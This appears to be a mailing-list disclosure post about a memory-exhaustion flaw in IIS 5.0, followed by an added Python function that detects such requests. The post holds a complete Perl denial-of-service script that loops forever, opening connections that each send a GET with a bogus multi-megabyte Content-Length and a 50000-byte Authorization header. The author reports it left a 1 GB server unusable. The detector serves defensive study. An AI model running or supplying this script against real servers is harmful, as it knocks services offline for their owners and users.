Well, I have finally done some testing, and I have made a server with 1 GB of RAM run out of virtual memory and become basically unusable with one script that uses the flaw exposed in the other mails. I suppose that now it's a real security bug.

Thanks,
Ivan Hernandez

------------------------------------------------------------------------
#!/usr/bin/perl
# Written by Ivan Hernandez over code of Georgi Guninski
use IO::Socket;

print "IIS 5.0 Bogus Content-Length\n";

$port = @ARGV[1];
$host = @ARGV[0];

$req="GET /ampgn HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: 192.168.0.10
Connection: Keep-Alive
Content-Length: 5300643
Authorization: Basic " . "A" x 50000 . "\r\n\r\n";

$i=0;
while (1) {
    $socket[$i] = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP");
    syswrite($socket[$i],$req,length($req));
    print ".";
    $i++;
}
$i=0;
print "\nDone.";
------------------------------------------------------------------------
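Seen from the server side, the request in the script above has a recognisable shape: a GET that declares a multi-megabyte Content-Length and carries a 50000-byte Authorization value. The following is an added example, not part of the original post, of a check that a front-end filter or log reviewer could apply to a request head; the function name, finding labels and both limits are assumptions chosen for illustration.

```python
# Added example: flag request heads shaped like the one in the script above.
# The two limits are assumed values for illustration, not IIS settings.
MAX_HEADER_VALUE = 8192        # assumed per-header size limit, bytes
MAX_DECLARED_BODY = 1 << 20    # assumed largest body we accept, bytes
BODYLESS_METHODS = {"GET", "HEAD"}


def inspect_request_head(raw: bytes) -> list[str]:
    """Return findings for one raw HTTP request head (up to the blank line)."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3:
        return ["malformed-request-line"]
    method = parts[0].upper()
    findings = []
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if not sep:
            findings.append("malformed-header")
            continue
        name, value = name.strip().lower(), value.strip()
        if len(value) > MAX_HEADER_VALUE:
            findings.append(f"oversized-header:{name}")
        if name == "content-length":
            # Reject anything that is not a plain ASCII decimal number.
            if not (value.isascii() and value.isdigit()):
                findings.append("bad-content-length")
                continue
            declared = int(value)
            if declared > MAX_DECLARED_BODY:
                findings.append("content-length-over-limit")
            if declared > 0 and method in BODYLESS_METHODS:
                findings.append("body-declared-on-" + method.lower())
    return findings


# Constructed inputs: one shaped like the script's request, one ordinary.
SUSPECT = (b"GET /ampgn HTTP/1.1\r\nHost: server.example\r\n"
           b"Connection: Keep-Alive\r\nContent-Length: 5300643\r\n"
           b"Authorization: Basic " + b"A" * 50000 + b"\r\n\r\n")
ORDINARY = b"GET /index.html HTTP/1.1\r\nHost: server.example\r\n\r\n"

if __name__ == "__main__":
    print(inspect_request_head(SUSPECT))
    print(inspect_request_head(ORDINARY))
```

A request that trips more than one of these findings, repeated across many connections that the client holds open, is the pattern to alert on or reject before the request reaches the application server.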